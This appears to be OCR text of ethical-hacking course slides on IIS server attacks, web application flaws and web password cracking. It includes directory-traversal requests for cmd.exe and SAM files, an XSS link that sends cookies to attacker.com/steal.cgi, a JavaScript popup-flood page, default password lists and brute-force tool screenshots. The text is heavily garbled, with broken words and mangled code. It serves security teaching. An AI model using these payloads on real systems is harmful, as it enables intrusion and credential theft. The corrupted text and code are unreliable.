entries based on his I P address in W3SVC Log Files. 



C Untitled - Notepad 



_J[nJ[x 



|-iie taic i-ormac view Meip 



Jun 10 12:53:37.349L4.5.6^7l3P=GET arg=http : //Target ^ 
IP/msadc/. .%255c. ./^^¥S9^./. .255c. ./winnt/system32/cmd .exe?/c+dir+c :\\* .cif/s/b 
result="500 Server Error" 

Jun 10 12:53:39.675 4.5.6.7 op=GET arg=http ://Tdrget || 
IP/d .asp/. .%cl%lc . ./. .%cl%lc . ./winnt/repdir/sam result="404 Object Not Found" 
Jun 10 12:53:43.573 4 . 5 . 6 . 7| op=GET arg=http : //Target 

IP/a. asp/. .%cl%9c. ./. .%cl%9c. ./winnt/repair/sam result="404 Object Not Found" U, 
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File System Traversal Counter measures 



© Microsoft recommends setting the NTFSACLS on 
cmd.exeand several other powerful executabi es to 
Administration and SYSTEM: Full Control only. 

© Remove executable permission to I USR account. 

©This should stop directory traversal in 1 1 S. 

© Apply M icrosoft patches and H otfixes regularly. 
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Solution: UpdateExpert 



0 Update Expert is a Windows administration program 
that he! ps you secure your systems by remotely 
managi ng service pacl<s and hot fixes. 

© M icrosoft constantly releases updates for the OS and 
mission critical applications, which fix security 
vul nerabi I i ties and system stabi I ity problems. 

© U pdateExpert enhances security, keeps systems up to 
date, el i mi nates sneaker- net, i mproves system 
reliability and QoS 



Bl-Council 



cacls.exe utility 



©Built-in Windows 2000 utility (cacls.exe) can set access control list 
(ACLs) permissions globally. 

©Let's say you want to change permissions on all executable files to 
System:Full, Administrators:Full, 

C : \>cacls . exe c : \myf older\ ^ . exe /T /G 
SystemiF Administrators : F 



c v Command Prompt 



C:\Snort>cacls -exe «.exe /T /G Systeii:F fldninistrators :F 

fire you sure <V/N>?y 

processed file: C:\Snort\snort.exe 

C:\Snort> 
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N etwork Tool : Whisker 



© Whisker is an automated vulnerability scanning 
software which scans for the presence of exploitable 
fi les on remote Web servers. 

© Refer the output of this simple scan given below and 
you will see Whisker has identified several potentially 
dangerous fi les on this 1 1 SSServer 

a: \> whisker, pi -h victim.com -s sccin.db 



= Host: victim, com 

= Server: Microsoft-IIS/S - 0 

+ 200 OK: GET /whisJcer. ida 

+ 200 OK: GET /whisker, idg 

+ 200 OK: HEAD / vti inf . html 

+ 200 OK: HEAD /_vti_bin/shtml. dll 

+ 200 OK: HEAD / vti bin/ shtml.exe 
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http://www 

nstal ker.com/ nstealth/ 

©N-Stealth 5 is an impressive 
Web vu I nerabi I i ty scan ner 
that scans over 18000 HTTP 
security issues. 

©Stealth HTTP Scanner 
writes scan results to an easy 
HTML report. 

©N -Stealth is often used by 
security companies for 
penetration testing and 
system auditing, specifically 
for testi ng Web servers. 
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H acki ng Tool : Webl nspect 



© Webl nspect is an impressive Web server and 
application- level vulnerability scanner which scans over 
1500 known attacks. 

© 1 1 checks site contents and analyzes for rudi mentary 
appi i cati on- i ssues I i ke smart guesswork checks, 
password guessing, parameter passing, and hidden 
parameter checks. 

© 1 1 can analyze a basic Webserver i n 4 mi nutes 
cataloging over 1500 HTML pages. 
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Network Tool: Shadow Security 
Scanner 



http:// www.safety- 1 ab.com 

© Security scanner is designed to identify l<nown and 
unl<nown vulnerabilities, suggest fixes to identified 
vulnerabilities, and report possiblesecurity holes within 
a network's i nternet, i ntranet and extranet 
environments. 

0 Shadow Security Scanner includes vulnerability 
auditing modules for many systems and services. 

© TheseincludeNetBIOS, HTTP, CGI andWinCGI, 
FTP, DNS, DoS vulnerabilities, P0P3, 
SMTP,LDAP,TCP/I P, UDP, Registry, Services, Users 
and accounts. Password vulnerabilities, publishing 
extensions, MSSQL,IBM DB2,0racle,MySQL, 
PostgressSQL, I nterbase. Mini SQL and more. 
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Countermeasures 



© IISLockdown: 

• 1 1 SLockdown restricts anonymous access to system 
uti I i ti es as wel I as the abi I i ty to write to Web content 
directories. 

• It disables Web Distributed Authoring and 
Versioning (WebDAV). 

• It installs the URLScan I SAPI filter. 

© URLScan: 

• UrIScan is a security tool that screens al I incoming 
requests to the server by f i Iteri ng the requests based 

on rules that are set by the administrator. 
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Summary 



0 Web servers assume critical i mportance i n the real m of I nternet 
security. 

© Vulnerabilities exist in different releases of popular web servers 
and respective vendors patch these often. 

© The i nherent security risks owi ng to compromised web servers 
have i mpact on the local area networks that host these web sites, 
even the normal users of web browsers. 

© Looking through the long list of vulnerabilities that had been 
discovered and patched over the past few years provide an attacker 
ample scope to plan attacks to un patched servers. 

© D i ff erent tool s/ expl oi t codes ai ds an attacker perpetrate web server 
hacking. 

© Countermeasures include scanning, for existing vulnerabilities and 
patching them immediately, anonymous access restriction, 
i ncomi ng traff i c request screen i ng and f i Iteri ng. 
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Ethical Hacking 



ModuleXII 

Web AppI i cati on Vu I nerabi I i ti es 



Module Objective 



© Understanding Web Application Security 

© Common Web Application Security 
Vulnerabilities 

© Web Application Penetration Methodologies 

© Input Manipulation 

© Authentication And Session Management 

© Tools: Lynx, Tdeport Pro, Black Widow, Web 
Sleuth 

© Countermeasures 
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Understanding Web Application Security 




Bl-Council 



Common Web AppI i cati on Vul nerabi I i ti es 



0 Reliability of Client- Side Data 

0 Special Characters that have not been escaped 

0 HTM L Output Character Filtering 

0 Root accessi bi I i ty of web appi i cati ons 

0 Acti veX/ J avaScr i pt Authenti cati on 

0 Lack of U ser Authenti cati on before performi ng cri ti cal 
tasks. 
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Web AppI i cati on Penetration 
Methodologies 



0l nformation Gathering and Discovery 

• Documenting Application/ Site Map 

• Identifiable Characteristics/ Fingerprinting 

• Signature Error and Response Codes 

• File/ Application Enumeration 

- Forced Browsing 

- Hidden Files 

- Vulnerable CGI s 

- Sample Files 

© I nput/ Output CI i ent-Si de Data M an! pul ati on 




BI-Gouncil 



http:// www.blazi ngtool .com 

0l nstant Source lets you take a 
look at a web page's source code, 
to see how thi ngs are done. Also, 
you can edit HTML directly 
inside I nternet Explorer! 

©The program i ntegrates i nto 
I nternet Explorer and opens a 
new tool bar window which 
i nstantly displays the source 
code for whatever part of the 
page you select i n the browser 
wi ndow. 
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Source 



1 Microsoft Corporation - Microsoft Internet Explorer 






<iiam ripaEKa Bn/i MsGpaHHoe CepEHC CnpaeKa 






Qna^aa - © ' @ @ ^ ^ Hohck ^^MsfipaHHoe ^Jf^MeflMa -0 0'^ | 






A/ipec; 1^ http; //www, microsoft, com/ 




* ; riepexofl CcbiJiKH 




Product Families 

Windows 
Office 

Business Solutions 
Servers 

Developer Tools 
Games and Xbox 
MSN Services 




Attend a free Windows 
Server 2003 launch event 

Set? trit Servftjr OperaiLing SysterTi tfiat ritlp5 'jou 
da more with I ess at a launch event nea r you . 



home & enter 

windows Movie Ma 



* Get free download! 



Display " II ^ Apply ^ Save As et3 Objects Copy ^ Fi 



<l--TOOLBAR_EXE[viPT--> 
<HTML> 
<HEAD> 

<META H^P-EqUIV="Content-Type" CONTENl 
<TITLE > Microsoft Corporation </TITLE > 
<META http-equiv="PICS-Label" content="(PIC 
true r (n 0 s 0 V 0 I 0))" /> 
<META NAME="KEYWORDS" CONTENT="produ 
solutions; services; software; contests; corpor 
<META NAME="DESCRIPTION" CONTENT="The 
answers^ support^ and Microsoft news," /> 
<META NAME =" MS, LOCALE" CONTENT="EN-US" /> 
<META NAME =" CATEGORY" CONTENT="home page" /> 
www.microsoft.com | default.css | popiip020912.is | ctredir.is | toolbar.is | 



EKternal obiects on this page: 







http 


/'/c.microsoft.comArans_pixel.asp?source=wwwS! 






http 


//wmw.mic 


rosol 


. com/'homepage/gif/bnr-micro : ol 






http 




rosof 


.com/'librariJAoolbar/images/curv 






http 


//wiAJw.mic 


rosol 


.com/'homepage/gif/lptrans.gil 






http 


//wiAJw.mic 


rosol 


. com/'library/homepage/images/l 






http 


//www.mic 


rosol 


. confi^'homepage/gif/artH omeS. g 






http 


//www.mic 


rosol 


.com^^homepage/gif/bulletK.gif 






http 


/Mww.mic 


rosol 


. conti^^homepage/gif/ artT ech5. gil 






http 


//wiAJw.mic 


rosol 


.conti^homepage/gif/ artB i25.gif 
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http 


//www.wiK 


rosol 


.com/'homepage/gif/brancls.gif 



El-Q Flash movies 
< L 



m 



I Copy URL I 
I Save... I 



mm 



^ rOTOEO 
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H acki ng Tool : Lynx 



http:// lynx.browser.org 

Lynx is a text- based browser used for downloading 
source files and directory links. 



Lynx I nf D vmsit iofi 



Neifs' Lynx 2»7 has been relfr«eed* 

Lvnx 

Lynx is a text brouseif for the Uoi'^ld Hide Meb. Released versions run 
on UHS and uarioiis uei-sions of Un^x- (1 port to Win32, ^tnd to DOS 3B6 + 
V ia D JGPP are in c luded in Che c u rre n t de oe lo pme n ta 1 oeps inn . 

^ How to sret Lyt^Xf and nuch no re infornation^ is available at Lynx 
link&. 

* Many user questions are ansuei'ed, and links to useful resources 
eellectad^ in the online h^lp provided with L^nx* Prese the 
question -nark <?> key to access this help; broyse around a bit. 

» If you are encountering difficulty with Lynx you nay write to 

hel]pl?lyrix.b]-^uvisei-.4>i^^. The dL-uelDpers definitely yant to hear if 
you have trouble yith the curi'ant version of ttie code. Trouble 
repoi^ts fron earlier versions are listened to politely; nany 
t r o ub le spots hau e been f i )^e d in lat e r r e leas e s . 

* At this site, Lynxrp is a developnental version. 

Ha in ta in ed by ly n xde vPbr p ws e r ■ o r j , 



hi. t p = y/^uww _ s Icc _ Eidu^F^lynx/f ot 
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Hacking Tool: Wget 



www.gnu.org/ software/ wget/ wget. html 

0 Wget is a command line tool for Windows and Unixthat 
wi 1 1 download the contents of a web site. 

© 1 1 works non-i nteracti vely, so it wi 1 1 work i n the 
background, after having logged off. 

© Wget works particularly well with slow or unstable 
connections by continuing to retrieve a document until 
the document is fully downloaded. 

© Both http and ftp retrievals can be time stamped, so 
Wget can see if the remote f i le has changed si nee the 
last retrieval and automatically retrieve the new version 
if it has. 
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Hacking Tool: Blac 



http://softbytelabs .com 

©Black widow is a website 
scanner, a site mapping 
tool, a site ripper, a site 
mirroring tool, and an 
off I i ne browser program. 

©Use it to scan a site and 
create a compi ete prof i I e of 
the site's structure, files, E- 
mail addresses, external 
li nks and even link errors. 
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Site URL : j http: / / chandra. harvard. edu/ 

Browser ^ Structures "J @E mails ^ Ext Links J Link Err 



Threads 




Chandra^ s First Images!!! 
Launch Occurred 81 days ago 



Publii Information 
and Cdttcatinh 



Chandra 
Chronicles 




PhfltD AJbiufi: See the first Chandra 
unages, with descriptions and 
comparisons in the Photo Alhum. 

Chandra Chronicles: Read about 
the excitement and trepidation of 
the Chandra science and operations 
teams as they work to activate this 
great telescope. More Info (1:5 Sep 
99) 

Pressroom: Press Releases, images, 
status updates & more in the 
Pressroom . 

Poll: When do you think humans 
will travel outside the solar system? 
■SA6 Vote! 



. Verify Butfer; || 0 left Fetch buffer: || 0 left 



Download Bu ffer: 0 left Status: Done Elapsed: 00:00:50 ^ 
- ] 1 Selected. 274 Bytes 34 folders. 9G5 Files. 1 5.921 .57S Bytes ^ 



H acki ng Tool : WebSI ejth 



© http://sandsprite.conn/sleuth/ 

© WebSI euth i s an excel I ent tool that combi nes spi der i ng 
with the capabi I ity of a personal proxy such as Achi I les. 




Browser X Source 1 Intercept 1 Spider 1 Options 1 Notes 



about:blank 








& <^ o ^ \l 


^ Properties 


■J^ Toolbox 


Plugins 


Favorites 


Filter! LIKE 1* 



No Links In Document 
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Hidden Field Manipulation 



0 Hidden fields are embedded within H TIM L forms to maintain 
val ues that wi 1 1 be sent back to the server. 

0 H i dden f i el ds serve as a mean for the web appi i cati on to pass 
information between different applications. 

0 Using this method, an application may pass the data without 
saving it to a common backend system (typically a database.) 

0 A major assumption about the hidden fields is that si nee they 
arenon visible (i.e. hidden) they will not be viewed or changed 
by the client. 

0 Web attacks challenge this assumption by examining the 
HTML code of the page and changing the request (usually a 
POST request) goi ng to the server. 

0 By changi ng the val ue the enti re I ogi c between the di fferent 
application parts, the application is damaged and manipulated 
to the new value. 



BZ-Gouncil 



Input Manipulation 



©URL Manipulation -CGI Parameter 
Tamperi ng 

©HTTP CI lent- Header Injection 



©Filter/ Intrusion Detection Evasion 



©Protocol/ Method Manipulation 



©Overflows 




What is Cross Si deScripting(XSS)? 



0 A Web application vulnerable to XSS allows a user to 
i nadvertently send mal icious data to self through that 
application. 

0 Attackers often perform XSS exploitation by crafting 
mal i ci ous URLs and tri cki ng users i nto cl i cki ng on 
them. 

0 These I i nks cause cl lent side scri pti ng languages 
) VBScri pt, J avaScri pt etc,) of the attacker's choi ce to 
execute on the vi cti m's browser. 

0 XSS vulnerabi I i ties are caused by a failure in the web 
application to properly validate user input. 
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Authentication And Session 
M anagement 



©Brute/ Reverse Force 



©Session Hijacking 
©Session Replay 
©Session Forgoing 
©Page Sequencing 
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Traditional XSS Web Application Hijacl< 
Scenari o - Cooki e steal i ng 



©User is logged on to a web application and the session is 
currently active. An attacker knows of a XSS hole that affects 
that application. 

©The user receives a mal icious XSS I i nk via an e-nriai I or comes 
across it on a web page. I n some cases an attacker can even 
insert it into web content (e.g. guest book, banner, etc,) and 
makeit load automatically without requiring user intervention. 

<html> 

<headXtitle>Look at this!</title></head> 

<body><ahref a" http: //hotwired, lycos* coin/wefamonkfiy/00/18/iiidex3ajpage2 . ht 
ml?tv=<script>doGumBzit* location, replace ( ' http: / /attacker. oom/steaL cgi? ' -(-d 
ocunent. cookie) ;</script>"> Check this CM story out! </aX/body> 
</hbnil> 
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XSS Countermeasures 



0 As a web appi i cation user, there are a few ways to 
protect yourselves from XSS attacks. 

© The first and the most effective solution is to disable all 
scripting language support in your browser and email 
reader. 

© Ifthisisnota feasible option for business reasons, 
another recommendation is to use reasonable caution 
whi I e cl i cki ng I i nks i n anonymous e- mai I s and dubi ous 
web pages. 

© Proxy servers can hel p f i Iter out mal i ci ous scri pti ng i n 
HTML. 
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Buffer Overflow in Wl NHLP32.EXE 



© A buffer-overrun vulnerability in Wl NHLP32.EXE 
could result in the execution of arbitrary code on the 
vulnerable system. 

©This vul nerabi I i ty stems from a f I aw i n the I tern 
parameter within WinH LP Command. 

© This exploit would execute in thesecuritycontext of the 
currently logged on user. 

© M icrosoft has released Windows 2000 Service Pack 3 
(SP3), whi ch i ncl udes a fix for thi s vul nerabi I ity. 
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Hacking Tool: Helpme2.p 



0 Helpnne2.pl isanexploitcodeforWinHelp32.exe 
Remote Buffer Overrun vulnerability. 

© This tool generates an HTML file with a given hidden 
connnnand. 

© When thisHTMLfileis sent to a vi cti nn through e nnai I , 
it infects thevictinn's connputer and executes the hidden 
code. 
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Hacking Tool: WindowBomb 




File Edit Format View Help 



<HI>IL> 



<HEAD> 

<TITLE>WARNING! Infecting Virus ! </TITLE> 
</HEAD> 

<BODY onload="WindowBomb() "> 
< SCRIPT LANGUAGE = "JavaScript "> 

function WindowBomb ( ) 
{ 

var iCounter =0 // dummy counter 
while (true) 

{ 

window . open ( "http : //www . netscape . com" , "CRASHING" 

+ iCounter, "width= 1 ,height= 1 ,resizabIe=no " ) 
iCounter++ 



</script> 
</BODY> 



} 



I 



</HTML> 



An emai I 




up windows 



J avaScript is vulnerable to simple coding such as this. 
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Hacking Tool: lEEN 



http:/ / www.secu ri tyf ri day.com/ Tool Down I oad/ 1 E en 

0l EEN rennotely controls I nternet Explorer using DCOM . 

0l f you knew the account name and the password of a remote 
machine, you can remotely control the software component on it 
usi ng DCOM . For example I nternet Explorer is one of the soft 
wares that can be control led. 

File Help 



IConnectto Remote! 

f 



C Connectto Local 



Remote IP 



Connect as User Below 
Username 



C Connect as Current User 



Password 



QK 



Exit 




Summary 



© Attacki ng web appi i cati ons i s the easi est way to compromi se hosts, 
networks and users. 

© Generally nobody notices web application penetration, until serious 
dannage has been done. 

© Web application vulnerability, can be eliminated to a great extent 
ensuring proper design specifications and coding practices as well as 
implementing common security procedures. 

© Various tools hel p the attacker to view the source codes and scan for 
security holes. 

© The first rule in web application development from a security 
standpoint is not to rely on the client side data for critical processes. 
Using an encrypted session such as SSL / "secure" cookies are 
advocated instead of using hidden fields, which are easily manipulated 
by attackers. 

© A cross-sitescripting vulnerability iscaused bythefailureof a web 
based application to validate user supplied input before returning it to 
the client system. 

© If the application accepts only expected input, then the XSS can be 
significantly reduced. 
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Ethical Hacking 



ModuleXIII 

Web Based Password Cracki ng 
Techniques 



Module Objective 



© HTTP Authentication Basic & Digest 

© NTLIVI Authentication 

© Certificate Based Authentication 

© Forms Based Authentication 

© IV| icrosoft Passport 

© Password Guessing 

© WebCracl<er 

© Brutus 

© WWWHACK 

© Obi Wan Password Cracl<er 
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Basi c Authenti cati on 



© Basi c authenti cati on i s the most basi c form of 
authentication to web applications. 

© The authentication credentials are sent clear- text with 
base64 encryption (can be decoded) and is subject to 
eavesdropping and replay attacks. 

© The use of 128 bit SSL encryption can thwart attacks. 
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Digest Authentication 



© Digest authentication is based on a challenge- response 
authenti cati on model . 

© The user makes a request without authentication 
credentials and the Web Server replies with a WWW- 
Authenticate header indicating credentials. 

© I nstead of sendi ng the user name and password the 
server challenges the client with random nonce. 

© The cl lent responds with the message digest of the 
usernam^ password. 
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NTLM Authentication 



0 NTLM Authentication is 
M icrosoft's proprietary 
NT LAN |V| anager 
authentication algorithm 
over HTTP. 1 1 works on 
Microsoft Internet 
Explorer only. 

0 Integrated Windows 
authentication works the 
same way as M essage 
Digest authentication. 



AulrhenUcdtion Methods 



No usef nanie/p3sswofd required to aco^^ t»s r@souC&. 
AccDunft used foE anonj^fnous access 

User F^e: |lUSR_ECCOUNDL Sro^wse... 
Allow IIS lo control password 



m 



r Alilhertlicated acioess 

For the JQllgwing autKentecation m^hodSn user rwme and password 
aie reQuired when 

' arMjmynnous access is dsabtedn or 

- access is resuicted mktQ N TFS access control ists 

P Dige^ atKDhenUcatfors foi Windows dorrtain s*3jvers 
r* Basic aUhertlication (password is sent in clear te>it) 
Dfifadt dofTiainc 




Bl-Council 



Certificate Based Authentication 



© Certi f i cate authenti cati on 
is stronger than other 
authentication 
mechanisnns 

0 Certificated 
authentication uses 
publ i cOkey cryptography 
and d i gi tal certi f i cate to 
authenti cate a user. 
Certificates can be stored 
i n smart cards for even 
greater security. 

0 There is no current 
l<nown attacl<s agai nst 
PKI security so far. 



CertiRcate 



General | Details ] Certification Path | 



VTT-S Certificate InFormation 



This certificate is intended for tfie following purpose(s): 

• Ensures software came from software publisher 
•Protects software from alteration after publication 
•Windows Hardware Driver Verification 



Issued to: Microsoft Windows Hardware Compatibility 



Issued by: Microsoft Root Authority 



Valid from 10/1/1997 to 12/31/2002 




Issuer Statement 



OK 
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M icrosoft Passport Authentication 



0 Si ngle signon is the term used to represent a system 
whereby users need only remember one user name and 
password, and be authenticated for multiple services. 

© Passport is M icrosoft's universal si ngle sign- in (SSI ) 
platform. 

0 1 1 enabi es the use of one set of credenti al s to access any 
Passport enabled site such as M SN , H otmai I and M SN 
M essenger. 

0 M icrosoft encourages thi rd- party companies to use 
Passport as a Universal authentication platform. 



Bl-Council 



Forms- Based Authentication 



0 It is highly customizable authentication nnechanisnnthat 
uses a form composed of HTM L with <FORM > and 
<l N PUT> tags del i neati ng fields for users to i nput thei r 
usernam^ password. 

© After the data input via HTTP or SSL, it is evaluated by 
some server- side logic and if the credentials are valid, 
then a cookie is given to the cl lent to be reused on 
subsequent visits. 

© Forms based authentication technique is the popular 
authentication technique on the internet. 
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Hacking Tool: WinSSLMiM 



http:// www.securitei nfo.coim/ outi I s/ Wi nSSL M i M .shtml 

© WinSSLMiM isan HTTPS Man in theMiddleattacl<ing 
tool. It includes FakeCert, a tool to make fake 
certificates. 

0 1 1 can be used to exploit the Certificate Chai n 
vulnerability in I nternet Explorer. The tool works under 
Windows 9x/ 2000. 

© Usage: 

- FakeCert: fc-h 
-WinSSLMiM: wsm-h 



Bl-Council 



Password Guessing 



© Password guessing 
attacks can be carried out 
manually or via 
automated tools. 

0 Password guessi ng can 
be performed agai nst al I 
types of Web 




Authentication 

The common passwords used are: root, administrator, 
admin, operator, demo, test, webmaster, backup, guest, 
trial, member, private, beta, [company_name] or 
[ known_ username] 
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H acki ng Tool : WebCracker 



WebCracker is a simple tool 
that takes text I i sts of 
usernames and passwords 
and uses them as 
dictionaries to implement 
Basic authentication 
password guessi ng. 

©Itkeyson "HTTP 302 
Object Moved" response to 
i nd i cate successf u I guess. 

© 1 1 wi 1 1 f i nd al I successful 
guesses given in a 
username^ password. 




YOU can enter us@r/pass comi nations like 
usernames pas sword 
jimes :bond 

# when the file is used as a username file, 

# And of course if used as a password file. 



# special thanks to shadowcasi for these: 
asdf :2xcv 
asdf :fdsa 
qwerxyiyirewq 
qwerty:asdf 
zxcvbJbvcKZ 
zxcvb:asdf 
qwertyszxcvb 



thT? 



it will 
it will 



I 



iL 



J 
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http:/ / www. hoobi e. net/ brutus/ 

Brutus is a generic password 
guessi ng tool that cracks various 
authentication. 

©Brutus can perfornn both 
dictionary attacks and brute- 
force attacks where passwords 
are randonnly generated from a 
given character. 

0 B r utus can crack the f ol I owi ng 
authentication types: 

©HTTP (Basic authentication, 
HTML Form/ CGI); P0P3; FTP; 
SMB; Telnet 
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xjBrulus - AET2 - HHH.hoobie.net/brutus - (Januafv 2000] JIIbIBI 



File Igok Help 



arget |172.1G.105.1_ 
[■■Connection Options- 



Tj^pd |HTTPlBasicAiJhl _| 





Pause 


Stop 


Clear 



Port I SO ~ Connections'/ ~ Timeout '^fTTTTTTr "'^ rUseProKv Define | 



-HTTP (Basic) Options- 



Method |hEAD 3 PKeepAyve 




"Authentication Options' 




Pass Mode [Brute Force ^| Range j Di^itributed | 
Pass File 



Positive Authentication Results 




Target 



Type 



Username 



Password 



Initialising... 

Target 172.1 G.I 05.1 verified 
Brute force will generate 1 1 SSI 37G Passwords. 
MaHimurm number of authentication attempts will be 1 1 S81 376 



Engaginq target 17Z1G.10M with.HTTP Basic Authi 



3Z 



|11G87SS 



U: admin P:afuzK 



^J. Attempts per second ^Estimated 5: 5G: 41 remainit 




ittp:// www.phenoel it.d^ o 
bi wan/ docu. html 

©Obi Wan is a powerful 
Web password cracl<i ng 
too . It can worl< through a 
proxy. 

©Obi Wan uses wordlists 
and alternations of numeric 
or alpha- numeric 
characters as possi ble as 
passwords. 

©Si nee Webservers al I ow 
unlimited requests it is a 
questi on of ti me and 
bandwidth to break into a 
server system. 
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Proi 



odename: ObiWaN 



H ost: hUp: / / abc. com/ secure 
Port: 80 



Version 0.6 



Wordlist: (not selected) 
Special: (not selected) 



Account: administrator. 



H acki ng Tool : M unga Bunga 



Munga Bunga's HTTP Brute Forcer - Version 1.0.3 (Build 3) 



File Process Options Help 



AAimgn femgn'c HTTP (rrtilc Fctckt 



The Hackoloq^J Network - http7/www.hackoloq^J.corin 



Username to brute force 



lamer- 



Number of threads 



Word List for Passwords 



C:\Program Files\HTTP Brute Forcer\pass.lst 



Definition File For HTTP and Server Information 



A Start from begining of 

I** password file. 
^ Start/continue brute force 
-| * from the following password.... 

^ I 1 



CAProgram FilesVHTTP Brute ForcerVencite.def 



m 



Start/continue brute force 
from password number... 

1 I 



These passwords are 
being processed now. 



These passwords had Response received from the server for my last 
errors, shall retry later. 



(Response HTML codes here. 



If disconnected from the internet, pause 
IB process, reconnect to the internet, and 
resume with process, automatically. 

IB Don't retry passwords with errors. 

13 Don't process passwords with spaces. 

1= Don't pro cess passw ords containing 

* less then 5 | characters. 

1= Don't proc ess passw ords containing 

* more then 10 | characters. 

[3 Process all passwords as lowercase. 



Form Method 



Status: Inactive 
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Dictionary Maker 



You can download dictionary files from the I nternet or 
generate your own. 



1 Dictionary 


^^^^■r -Inlxl 


Dictionary: 
j File: 


Status: 


1 C: \do wnloads\H -M D ictionaries. zip 


Size (bvtes): 9^4465 


h Create | Load... | Close | Save... | 


Size (™rds):1061 87 


Dictionary charset: 


1 abcdef ghijklmnopqrstu V WHVzAB CD E FG H IJ KLM N □ PQ R S T U VWXrZaaaaaa^aef eeeei r\'\6nb66o6^Ma^^ 



~ Files to process: 



Add file(s]... | Clear list 



~ Progress: 



Processing., 



Start 



23^ 



Cancel 



- Options: 

p' Case register 



Clear results 



r Results: 

Current file name: H-MDictionaries.zip 

Current file size: S6SS57 

Total words: 70540 

Checked words: 47436 

Work speed: Processing. . . 



About 
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Hacking Tool: PassList 



Passlist is another character based password generator. 



C PASSLIST.TXT - Notepad 



File Edit Format Vie^^ Help 

starwars ! 
starwars" 

starwars# h 
starwarsS 
starwars% 
5tarwar5& 
starwars ' 
starwarsC 
starwars) 
starwars*' 
starwars+- 
starwars, 
5tarwar5- 
starwars. 
starwars/ 
starwarsO 



* « * « Passlist.txt generator for Brute « » « * 
"The truth is out there" 



Do you haue a fixed beginning? (V/N): y 
Enter string: starwars 

Enter the rnaxinun nunber of randoin characters per password: 2 

Generating passwords 

\ Processing ... Please wait. 

Process ended 
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Query string 



0 The query String is the extra bit of data in the URL after 
the question mark (?) that is used to pass variables. 

© The query stri ng is used to transfer data between cl ient 
and server. 

Example: 

http : / /www. mail . com/mail . asp?mailbox=sue& 
company=abc%2 Ocom 

You can attempt to change J oe's mai I box by changi ng 
the URL to: 

http : / /www. mail . com/mail . asp?mailbox=sue& 
company=abc%2 Ocom 
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Hacking Tool: cURL 



curl 7.10 <uin32> libcu^l/7.i0 
Usage: curl [options...] <url> 

Options: <H> means HTTP/HTTPS only, <F> neans FTP only 
-a/ — append Append to target file ulien uploading <F> 

-fl/— user-agent <string> User-flgent to send to server <H> 

-h/ — cookie <nane=string/f ile> Cookie string or file to read cookies fron <H> 
-B/ — use-ascii Use SSCI I/text transfer 

-c/— cookie-jar <file> Urite all cookies to this file after operation <H> 
-C/ — continue-at <offset> Specify absolute resume offset 
-d/~data <data> HTTP POST data <H> 

—data-ascii <data> HTTP POST ASCII data <H> 

—data-binary <data> HTTP POST binary data <H) 

— disable-epsu Prevents curl fron using EPSU <F> 
-D/ — dunp-header <file> Urite the headers to this file 

~egd-file <file> EGD socket path for randon data <SSL> 
-e/ — referer Referer page <H> 

-E/ — cert <cert [ :passud]> Specifies your certificate file and passuord <HTTPS) 
—cert-type <type> Specifies certificate file type <DER/PEM/ENG> <HTTPS> 
— key <key> Specifies private key file <HTTPS> 

—key-type <type> Specifies private key file type <DER/PEM/ENG> <HTTPS> 

— pass <pass> Specifies passphrase for the private key <HTTPS> 

— engine <eng> Specifies the crypto engine to use <HTTPS) 

— cacert <file> Cfl certifciate to verify peer against <SSL> 

— capath <directory> CA directory (nade using c_rehash> to verify 

peer against <SSL, NOT Uindous) 
—ciphers <list> Uhat SSL ciphers to use <SSL> 
— compressed Request a compressed response <using deflate). 
— connect-timeout <seconds> Maximum time alloued for connection 
— crlf Convert LP to CRLF in upload. Useful for MUS <OS/390) 

-t/ — fail Fail silently <no output at all) on errors <H) 

-F/— form <name=content> Specify HTTP POST data <H) 

~Sf^ — globoff Disable URL sequences and ranges using <> and [] 

-G/— get Send the -d data uith a HTTP GET <H) 

-h/ — help This help text 

-H/ — header <line> Custom header to pass to server. <H) 
-i/ — include Include the HTTP-header in the output <H) 

-I/— head Fetch document info only <HTTP HEflD/FTP SIZE) 

-j/ — junk-session-cookies Ignore session cookies read from file <H) 
^^^^iiterfac^<iiiterface^§pec 



http://curl.haxx.se 

cURL isa mu I ti- protocol transfer 
I i brary. 

0cU RL is a free and easy-to-use 
client side URL transfer library, 
supporting FTP, FTPS, HTTP, 
HTTPS, GOPH ER, TELNET, 
DICT, FILE and LDAP. 

0CURL supports HTTPS 
certificates, HTTP POST, HTTP 
PUT, FTP uploading, Kerberos, 
HTTP fornn based upload, 
proxies, cookies, user-hpassword 
authentication, file transfer 
resunne, http pro)(y tunneling and 
more 
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Cooki es 



0 Cookies are popular form 
of session management. 

0 Cookies are often used to 
store i mportant f i el ds 
such as usernames and 
account numbers. 

0 Cookies can be used to 
store any data and al I the 
fields can be easily 
modified using a 
program I i ke Cooki eSpy 
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t^f' Camtech's CT Cookie Spy v2.0 



CT Cookie Spy 2.0 

Number of Cookies Found: 1 1 3 

I ^ 

I 
i 

i 

Where they came from: 

| 1 28.242.232.1 42/ Delete | 

Date Installed: 1 2/25/2002 6:1 G: 05 PM 

DateExpires: 12/2G/20025:1G:0GPM 

Cookie Life: 0 year 23 hours, 0 minutes, 1 second 

About Mailing List Close I 



Hacking Tool: ReadCookies-html 



Read cookies stored on the computer, this tool can be used 
for stealing cookies or cookies hijacking. 




EG-GOUncil - Ethical Hacking Demonstration (Cookie Hijacking) 

Choose site to read cookies from: 

Suggestions' https://login.passport.com/ | http://www.yahoo.coni/ | 



1 https://login.passport.com/ 




Read cookies j 


Reset 1 



Cookie: 

status: Waiting for input 
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Hacking Tool: SnadBoy 



http : / / www. sn ad boy. com 

"Snadboy Revelation" turns back the asterisk in password 
fields to plain text passwords. 



SnadBoy's Revelation 



'Circled +' Cursor 

Drag to reveal password 



Check For 



Update I 



About 



Exit I 



Text of Window Under 'Circled +' Cursor (if available) 



J. 

Copy to clipboard | 



Status 

Revelation idle. 



Length of available text: 0 



Reposition Revelation out of the wa^^ when dragging 'circled +' I Alwa^^s on top 

When minimized, put in System Tray I Hide 'How to' instructions 



How to 

1 ) Left click and drag (while holding down the left mouse button) the 'circled +' 

2) As you drag the 'circled +' cursor over different fields on various windows, the text in the field 
under the cursor will be displayed in the 'Text of Window...' box. 

3) Release the left mouse button when you have revealed the text you desire. 

NOTE - If the field contains text hidden by asterisks (or some other character), the actual text will be 
shown. In some cases the text may actually be asterisks. 

NOTE - Not all of the fields that the cursor passes over will have text that can be revealed. Check 
the status light for availability of text. 

Bright green = text available (See 'Length of text:' in Status area) 

Bright red = no text available 
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Summary 



© The "basic" authentication scheme, the simp! est method of authentication 
and one of the most commonly used authentication method sends 
authentication details in clear. 

© Digest authentication, never sent across the network user's credentials i n the 
clear, but transmits as an M D5 digest of the user's credentials. 

